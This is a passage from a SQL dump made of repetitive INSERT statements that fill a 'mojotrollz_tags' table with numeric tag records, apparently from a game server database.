`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3399, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3399, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3399, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3399, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3400, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3400, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3400, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3400, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3400, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3400, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3401, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3401, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3401, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3401, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3401, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3401, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3402, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3402, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3402, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3402, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3402, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3402, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3403, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3403, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3403, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3403, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3403, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3403, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3404, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3404, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3404, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3404, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3404, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3404, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3405, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3405, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3405, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3405, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3405, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3405, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3406, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3406, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3406, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3406, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3406, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3406, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3407, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3407, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3407, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3407, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3407, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3407, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3408, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3408, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3408, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3408, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3408, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3408, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3409, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3409, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3409, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3409, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3409, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3409, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3410, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3410, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3410, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3410, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3410, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3410, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3411, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3411, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3412, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3412, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3412, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3412, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3412, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3412, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3413, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3413, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3413, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3413, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3413, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3413, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3414, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3414, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3415, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3415, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3415, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3415, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3415, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3416, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3416, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3416, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3416, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3416, 1, 30, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3417, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3418, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3418, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3419, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3419, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3421, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3421, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3424, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3424, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3425, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3425, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3425, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3425, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3425, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3426, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3426, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3426, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3426, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3426, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3428, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3428, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3428, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3428, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3428, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3429, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3429, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3429, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3429, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3429, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3430, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3430, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3431, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3431, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3431, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3431, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3431, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3432, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3432, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3432, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3432, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3432, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3433, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3433, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3434, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3434, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3435, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3435, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3436, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3436, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3438, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3438, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3438, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3438, 1, 10, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3438, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3439, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3439, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3441, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3441, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3442, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3442, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3442, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3442, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3442, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3443, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3443, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3443, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3443, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3443, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3444, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3444, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3445, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3445, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3446, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3446, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3446, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3446, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3446, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3447, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3447, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3448, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3448, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3448, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3448, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3448, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3449, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3449, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3449, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3449, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3449, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3450, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3450, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3450, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3451, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3452, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3452, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3452, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3452, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3452, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3453, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3453, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3453, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3453, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3453, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3454, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3454, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3455, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3455, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3456, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3456, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3457, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3457, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3458, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3458, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3459, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3459, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3461, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3461, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3461, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3461, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3461, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3463, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3463, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3464, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3464, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3464, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3464, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3464, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3465, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3465, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3466, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3466, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3467, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3467, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3468, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3468, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3469, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3469, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3470, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3470, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3470, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3470, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3470, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3471, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3471, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3471, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) 